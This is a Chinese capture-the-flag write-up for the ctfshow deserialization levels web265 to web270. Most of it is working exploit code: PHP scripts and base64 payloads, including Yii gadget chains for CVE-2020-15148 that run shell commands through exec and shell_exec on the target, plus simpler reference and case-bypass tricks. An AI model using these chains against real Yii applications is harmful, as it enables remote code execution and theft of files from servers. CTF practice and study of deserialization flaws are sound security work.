当前位置：首页 > article >正文

ctfshow-web入门-反序列化（web265-web270）

article 2024/11/13 8:05:22

1、web265

2、web266

3、web267

4、web268

5、web269

6、web270

1、web265

很简单的一个判断，满足 $this->token===$this->password; 即可

由于 $ctfshow->token=md5(mt_rand()) 会将 token 随机为一个 md5 值，我们使用 & 绕一下，让两个参数恒等

exp：

<?php
class ctfshowAdmin
{
    public $token;
    public $password;

    public function __construct($t, $p)
    {
        $this->token = $t;
        $this->password = $p;
    }
}

$c = new ctfshowAdmin(1,2);
$c->token = &$c->password;
echo serialize($c);
?>

payload：

?ctfshow=O:12:"ctfshowAdmin":2:{s:5:"token";i:2;s:8:"password";R:2;}

拿到 flag：ctfshow{11cbda99-2f50-42bb-89f9-d9b08318d448}

2、web266

__destruct() 在对象被销毁时会自动调用，我们只需要让 ctfshow 类正确被反序列化即可，但是直接传 ctfshow 会被检测，之后就会抛出异常，如果程序报错或者抛出异常就不会触发 __destruct() 了，因为 throw 那个函数回收了自动销毁的类，导致 __destruct() 检测不到有东西销毁，从而也就无法触发 __destruct()。

这里正则匹配大小写敏感，因此可以采用大小写绕过

exp：

<?php
class Ctfshow
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}
$c = new Ctfshow();
echo serialize($c);

payload：

O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

bp 重放或者 raw 模式下使用 hackbar，不然可能没回显

拿到 flag：ctfshow{cd17da6b-75f5-4cfc-b792-39bb72724740}

当然我们可以强行先触发它的 GC 回收来抛出异常，唤醒 __destruct() 魔术方法

触发方式有两种：对象被 unset() 处理时；数组对象为 NULL 时

这里采用第二种方式

exp：

<?php

class ctfshow
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}
$c = new ctfshow();
$m = array($c,0);
echo serialize($m);

payload：

a:2:{i:0;O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}i:1;i:0;}

3、web267

admin/admin 可以登录

提示 get 请求 view-source

///backdoor/shell
unserialize(base64_decode($_GET['code']))

Yii 的一个 CVE：CVE-2020-15148

用现成的 poc 打：

<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'exec';	
            $this->id = 'cat /f* > my6n.txt';
        }
    }
}
namespace Faker {

    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            $this->formatters['close'] = [new IndexAction(), 'run'];
        }
    }
}
namespace yii\db{

    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader=new Generator();
        }
    }
}
namespace{

    use yii\db\BatchQueryResult;

    echo base64_encode(serialize(new BatchQueryResult()));
}

payload：

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo0OiJleGVjIjtzOjI6ImlkIjtzOjE4OiJjYXQgL2YqID4gbXk2bi50eHQiO31pOjE7czozOiJydW4iO319fX0

访问 my6n.txt 即可看到 flag

4、web268

上一题的 poc 打不通了，换一个

<?php
namespace yii\rest {
    class Action
    {
        public $checkAccess;
    }
    class IndexAction
    {
        public function __construct($func, $param)
        {
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}
namespace yii\web {
    abstract class MultiFieldSession
    {
        public $writeCallback;
    }
    class DbSession extends MultiFieldSession
    {
        public function __construct($func, $param)
        {
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
        }
    }
}
namespace yii\db {
    use yii\base\BaseObject;
    class BatchQueryResult
    {
        private $_dataReader;
        public function __construct($func, $param)
        {
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}
namespace {
    $exp = new \yii\db\BatchQueryResult('shell_exec', 'cp /f* my6n.txt');
    echo(base64_encode(serialize($exp)));
}

payload：

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0

拿到 flag：ctfshow{f5b30e4e-16e1-4fb2-ad07-c75c6c069453}

5、web269

同上，payload：

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0

6、web270

payload：

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0